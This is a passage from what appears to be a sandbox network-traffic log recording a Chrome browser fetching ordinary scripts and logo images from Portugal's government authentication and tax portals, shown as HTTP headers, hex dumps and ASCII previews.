                                                                                                                  Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab20008e094d6193eafe9765c8c62a006c8cd37867b35d7e58c2d7eccaaf1053610f890866179f65113000db1f249c366326fd9c1d48464b082592a78ba2a12dfbdc4ad19e31ad68bde2b2631e5f5094ee8ea6e8c5651de3180039
                                                                                                                  2024-11-14 13:59:55 UTC370INHTTP/1.1 200 OK
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Last-Modified: Tue, 29 Oct 2024 12:00:34 GMT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Content-Type: text/javascript
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Connection: close
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:55 GMT
                                                                                                                  Age: 0
                                                                                                                  Content-Length: 8308
                                                                                                                  2024-11-14 13:59:55 UTC8308INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 65 29 7b 76 61 72 20 74 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 61 72 67 75 6d 65 6e 74 73 2c 31 29 3b 72 65 74 75 72 6e 20 65 2e 70 72 6f 70 3f 65 2e 70 72 6f 70 2e 61 70 70 6c 79 28 65 2c 74 29 3a 65 2e 61 74 74 72 2e 61 70 70 6c 79 28 65 2c 74 29 7d 66 75 6e 63 74 69 6f 6e 20 73 28 65 2c 74 2c 6e 29 7b 76 61 72 20 73 2c 61 3b 66 6f 72 28 73 20 69 6e 20 6e 29 6e 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 73 29 26 26 28 61 3d 73 2e 72 65 70 6c 61 63 65 28 2f 20 7c 24 2f 67 2c 74 2e 65 76 65 6e 74 4e 61 6d 65 73 70 61 63 65 29 2c 65 2e 62 69 6e 64 28 61 2c 6e 5b 73 5d 29 29 7d 66 75 6e 63 74
                                                                                                                  Data Ascii: (function(e,t){"use strict";function n(e){var t=Array.prototype.slice.call(arguments,1);return e.prop?e.prop.apply(e,t):e.attr.apply(e,t)}function s(e,t,n){var s,a;for(s in n)n.hasOwnProperty(s)&&(a=s.replace(/ |$/g,t.eventNamespace),e.bind(a,n[s]))}funct


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  19192.168.2.44975662.28.254.2124437208C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 13:59:55 UTC636OUTGET /at/html//autentica_static/logos/logotipo_AT.png HTTP/1.1
                                                                                                                  Host: www.portaldasfinancas.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                  Referer: https://www.acesso.gov.pt/
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-11-14 13:59:55 UTC800INHTTP/1.1 404 Not Found
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:55 GMT
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Content-Length: 315
                                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                                  Connection: close
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Set-Cookie: AT_P=!uQTuTYfOdmp4l5iXNCYICHCNuUpMaeEZ4wzloG6HQNB+tifpD1BMCIL85dQ+gBTJbL0POc/AMS+tJuA=; path=/; Httponly; Secure; SameSite=strict
                                                                                                                  Set-Cookie: TS01bc69dc=01e43c52fe02e876414b488368fbd5750f7a8763a3f38f477fe50b2da2ba10c916a4e119ebde3f6846260fb1b396afeabd0dbfebaa; Path=/; Secure; HTTPOnly
                                                                                                                  Set-Cookie: TS7d2bcbce027=08def0a5edab200057f1248157f3b8841b251fc39b1b6e1bf75c4ec867a31b2f64e663decd9af72a089dd318321130009a4753c39781e5dd5506ed5fe4b51845d08cb401546f81e3bc806e4ebb2ab6d43164d63fc5daddfacf3ef06f9732c57e; Secure; Path=/
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  2024-11-14 13:59:55 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  20192.168.2.44975862.28.254.2154437208C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 13:59:55 UTC1130OUTGET /autentica_static/js/smartresize.js?cb=5.2.10 HTTP/1.1
                                                                                                                  Host: www.acesso.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                  Referer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboard
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab20008e094d6193eafe9765c8c62a006c8cd37867b35d7e58c2d7eccaaf1053610f890866179f65113000db1f249c366326fd9c1d48464b082592a78ba2a12dfbdc4ad19e31ad68bde2b2631e5f5094ee8ea6e8c5651de3180039
                                                                                                                  2024-11-14 13:59:55 UTC401INHTTP/1.1 200 OK
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Last-Modified: Tue, 29 Oct 2024 12:00:34 GMT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Keep-Alive: timeout=2, max=18
                                                                                                                  Content-Type: text/javascript
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Connection: close
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:55 GMT
                                                                                                                  Age: 0
                                                                                                                  Content-Length: 852
                                                                                                                  2024-11-14 13:59:55 UTC852INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 24 2c 73 72 29 7b 0d 0a 0d 0a 20 20 20 20 2f 2f 20 64 65 62 6f 75 6e 63 69 6e 67 20 66 75 6e 63 74 69 6f 6e 20 66 72 6f 6d 20 4a 6f 68 6e 20 48 61 6e 6e 0d 0a 20 20 20 20 2f 2f 20 68 74 74 70 3a 2f 2f 75 6e 73 63 72 69 70 74 61 62 6c 65 2e 63 6f 6d 2f 69 6e 64 65 78 2e 70 68 70 2f 32 30 30 39 2f 30 33 2f 32 30 2f 64 65 62 6f 75 6e 63 69 6e 67 2d 6a 61 76 61 73 63 72 69 70 74 2d 6d 65 74 68 6f 64 73 2f 0d 0a 20 20 20 20 76 61 72 20 64 65 62 6f 75 6e 63 65 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 66 75 6e 63 2c 20 74 68 72 65 73 68 6f 6c 64 2c 20 65 78 65 63 41 73 61 70 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 76 61 72 20 74 69 6d 65 6f 75 74 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 20 64
                                                                                                                  Data Ascii: (function($,sr){ // debouncing function from John Hann // http://unscriptable.com/index.php/2009/03/20/debouncing-javascript-methods/ var debounce = function (func, threshold, execAsap) { var timeout; return function d


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  21192.168.2.44976262.28.254.2154437208C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 13:59:55 UTC908OUTGET /autentica_static/js/footer/footer.js?cb=5.2.10 HTTP/1.1
                                                                                                                  Host: www.acesso.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab20008e094d6193eafe9765c8c62a006c8cd37867b35d7e58c2d7eccaaf1053610f890866179f65113000db1f249c366326fd9c1d48464b082592a78ba2a12dfbdc4ad19e31ad68bde2b2631e5f5094ee8ea6e8c5651de3180039
                                                                                                                  2024-11-14 13:59:55 UTC401INHTTP/1.1 200 OK
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Last-Modified: Tue, 29 Oct 2024 12:00:34 GMT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Keep-Alive: timeout=2, max=38
                                                                                                                  Content-Type: text/javascript
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Connection: close
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:55 GMT
                                                                                                                  Age: 2
                                                                                                                  Content-Length: 3496
                                                                                                                  2024-11-14 13:59:55 UTC3496INData Raw: 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 0d 0a 20 20 20 20 2f 2a 2a 0d 0a 20 20 20 20 20 2a 20 50 72 65 65 6e 63 68 65 72 20 66 6f 6f 74 65 72 20 63 6f 6d 20 61 20 69 6e 66 6f 20 64 6f 20 52 47 50 44 0d 0a 20 20 20 20 20 2a 2f 0d 0a 0d 0a 20 20 20 20 76 61 72 20 66 6f 6f 74 65 72 45 6c 65 6d 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 66 6f 6f 74 65 72 2d 72 67 70 64 2d 63 6f 6e 74 65 6e 74 22 29 3b 0d 0a 0d 0a 20 20 20 20 69 66 20 28 77 69 6e 64 6f 77 2e 50 46 20 26 26 20 77 69 6e 64 6f 77 2e 50 46 2e 63 6f 6d 6d 6f 6e 20 26 26 20 77 69 6e 64 6f 77 2e 50 46 2e 63 6f 6d 6d 6f 6e 2e 66 6f 6f 74 65 72 29 20 7b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 66 6f 6f 74 65 72 45 6c
                                                                                                                  Data Ascii: window.onload = function() { /** * Preencher footer com a info do RGPD */ var footerElem = document.getElementById("footer-rgpd-content"); if (window.PF && window.PF.common && window.PF.common.footer) { footerEl


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  22192.168.2.44976162.28.254.2154437208C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 13:59:55 UTC904OUTGET /autentica_static/js/modernizr.js?cb=5.2.10 HTTP/1.1
                                                                                                                  Host: www.acesso.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab200056a5209536c90ec69ae9c8e6f303eb166912766094e2d565f1b9a255d719fc8d08a28fdf63113000a35d2fbd292ce0752279a47d1500e997887622511a8e8c8eeba8334d30b9595f10dcf4420e5d025c6ad3e102f6aa9754
                                                                                                                  2024-11-14 13:59:55 UTC370INHTTP/1.1 200 OK
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Last-Modified: Tue, 29 Oct 2024 12:00:34 GMT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Content-Type: text/javascript
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Connection: close
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:55 GMT
                                                                                                                  Age: 2
                                                                                                                  Content-Length: 5418
                                                                                                                  2024-11-14 13:59:55 UTC5418INData Raw: 2f 2a 20 4d 6f 64 65 72 6e 69 7a 72 20 32 2e 38 2e 33 20 28 43 75 73 74 6f 6d 20 42 75 69 6c 64 29 20 7c 20 4d 49 54 20 26 20 42 53 44 0d 0a 20 2a 20 42 75 69 6c 64 3a 20 68 74 74 70 3a 2f 2f 6d 6f 64 65 72 6e 69 7a 72 2e 63 6f 6d 2f 64 6f 77 6e 6c 6f 61 64 2f 23 2d 73 68 69 76 2d 61 64 64 74 65 73 74 2d 70 72 65 66 69 78 65 64 2d 74 65 73 74 73 74 79 6c 65 73 2d 74 65 73 74 70 72 6f 70 2d 74 65 73 74 61 6c 6c 70 72 6f 70 73 2d 68 61 73 65 76 65 6e 74 2d 70 72 65 66 69 78 65 73 2d 64 6f 6d 70 72 65 66 69 78 65 73 0d 0a 20 2a 2f 0d 0a 3b 77 69 6e 64 6f 77 2e 4d 6f 64 65 72 6e 69 7a 72 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 66 75 6e 63 74 69 6f 6e 20 7a 28 61 29 7b 69 2e 63 73 73 54 65 78 74 3d 61 7d 66 75 6e 63 74 69 6f 6e 20 41 28 61 2c 62 29
                                                                                                                  Data Ascii: /* Modernizr 2.8.3 (Custom Build) | MIT & BSD * Build: http://modernizr.com/download/#-shiv-addtest-prefixed-teststyles-testprop-testallprops-hasevent-prefixes-domprefixes */;window.Modernizr=function(a,b,c){function z(a){i.cssText=a}function A(a,b)


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  23192.168.2.44976062.28.254.2154437208C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 13:59:55 UTC902OUTGET /autentica_static/img/autenticacaogov.png HTTP/1.1
                                                                                                                  Host: www.acesso.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab200056a5209536c90ec69ae9c8e6f303eb166912766094e2d565f1b9a255d719fc8d08a28fdf63113000a35d2fbd292ce0752279a47d1500e997887622511a8e8c8eeba8334d30b9595f10dcf4420e5d025c6ad3e102f6aa9754
                                                                                                                  2024-11-14 13:59:55 UTC372INHTTP/1.1 200 OK
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Last-Modified: Tue, 29 Oct 2024 12:00:34 GMT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Keep-Alive: timeout=2, max=65
                                                                                                                  Content-Type: image/png
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Connection: close
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:55 GMT
                                                                                                                  Age: 300
                                                                                                                  Content-Length: 10264
                                                                                                                  2024-11-14 13:59:55 UTC10264INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 6a 00 00 00 a6 08 06 00 00 00 6a 67 a3 99 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 0e c3 00 00 0e c3 01 c7 6f a8 64 00 00 27 ad 49 44 41 54 78 5e ed 9d 8b 7b 15 d5 b9 c6 cf df 77 8a 56 db 6a 3d 6d ad 6d ed cd b6 a7 b5 c7 d6 73 4e 6f f6 b4 b6 b4 20 17 51 50 50 54 ea a5 55 e4 a2 02 22 5e 42 80 00 21 40 48 20 21 5c 43 12 08 04 92 90 0b b9 90 8b eb ec 77 33 0b 57 26 df 9a 59 33 7b 66 f6 ec 3d ef ef 79 de 47 1f f6 ac 35 93 d9 b3 67 de f9 d6 b7 be f5 6f 8a 10 42 08 21 84 e4 12 1a 35 42 08 21 84 90 9c 42 a3 46 08 21 84 10 92 53 68 d4 08 21 84 10 42 72 0a 8d 1a 21 84 10 42 48 4e 89 6d d4 66 e6 e6 d5 c8 c4 6d 35 34 3e 4d 51 89 69 6c
                                                                                                                  Data Ascii: PNGIHDRjjgsRGBgAMAapHYsod'IDATx^{wVj=mmsNo QPPTU"^B!@H !\Cw3W&Y3{f=yG5goB!5B!BF!Sh!Br!BHNmfm54>MQil


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  24192.168.2.44975962.28.254.2154437208C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 13:59:55 UTC902OUTGET /autentica_static/img/iconGovPt_20x20.png HTTP/1.1
                                                                                                                  Host: www.acesso.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab200056a5209536c90ec69ae9c8e6f303eb166912766094e2d565f1b9a255d719fc8d08a28fdf63113000a35d2fbd292ce0752279a47d1500e997887622511a8e8c8eeba8334d30b9595f10dcf4420e5d025c6ad3e102f6aa9754
                                                                                                                  2024-11-14 13:59:55 UTC364INHTTP/1.1 200 OK
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Last-Modified: Tue, 29 Oct 2024 12:00:34 GMT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Content-Type: image/png
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Connection: close
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:55 GMT
                                                                                                                  Age: 1
                                                                                                                  Content-Length: 622
                                                                                                                  2024-11-14 13:59:55 UTC622INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 14 00 00 00 14 08 06 00 00 00 8d 89 1d 0d 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 0b 11 00 00 0b 11 01 7f 64 5f 91 00 00 00 07 74 49 4d 45 07 df 03 04 0e 03 23 64 aa e6 66 00 00 00 18 74 45 58 74 53 6f 66 74 77 61 72 65 00 70 61 69 6e 74 2e 6e 65 74 20 34 2e 30 2e 39 6c 33 7e 4e 00 00 01 d9 49 44 41 54 38 4f cd 94 db 4b db 70 14 c7 f3 36 ff 1c 9f f7 b2 d7 31 d2 76 13 91 21 0e 2f 74 8e 81 43 70 db d3 50 1f b6 87 26 56 ad 4e bc 80 53 56 1f d4 87 b5 3a 98 43 31 49 3b 6c a1 56 5b ef 58 54 8a 60 f1 82 f5 32 2f 4d da a4 5f f3 fb 75 65 e4 2d 59 f7 e0 81 2f 81 73 7e f9 e4 9c ef 49 c2 fc f7 70 f0 52 b9 cd 25 54 d9 3a 4a 14 27 b1 8f 7b 66 1e 30 36 4e 48 da 79 21 57 b2 38
                                                                                                                  Data Ascii: PNGIHDRgAMAapHYsd_tIME#dftEXtSoftwarepaint.net 4.0.9l3~NIDAT8OKp61v!/tCpP&VNSV:C1I;lV[XT`2/M_ue-Y/s~IpR%T:J'{f06NHy!W8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  25192.168.2.449763184.28.90.27443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 13:59:55 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept: */*
                                                                                                                  Accept-Encoding: identity
                                                                                                                  User-Agent: Microsoft BITS/7.8
                                                                                                                  Host: fs.microsoft.com
                                                                                                                  2024-11-14 13:59:55 UTC465INHTTP/1.1 200 OK
                                                                                                                  Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                  Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                  Server: ECAcc (lpl/EF67)
                                                                                                                  X-CID: 11
                                                                                                                  X-Ms-ApiVersion: Distribute 1.2
                                                                                                                  X-Ms-Region: prod-weu-z1
                                                                                                                  Cache-Control: public, max-age=9984
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:55 GMT
                                                                                                                  Connection: close
                                                                                                                  X-CID: 2


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  26192.168.2.44976462.28.254.2154437208C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 13:59:56 UTC894OUTGET /autentica_static/img/logo-at.png HTTP/1.1
                                                                                                                  Host: www.acesso.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab200056a5209536c90ec69ae9c8e6f303eb166912766094e2d565f1b9a255d719fc8d08a28fdf63113000a35d2fbd292ce0752279a47d1500e997887622511a8e8c8eeba8334d30b9595f10dcf4420e5d025c6ad3e102f6aa9754
                                                                                                                  2024-11-14 13:59:56 UTC372INHTTP/1.1 200 OK
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Last-Modified: Tue, 29 Oct 2024 12:00:34 GMT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Keep-Alive: timeout=2, max=79
                                                                                                                  Content-Type: image/png
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Connection: close
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:56 GMT
                                                                                                                  Age: 0
                                                                                                                  Content-Length: 8698
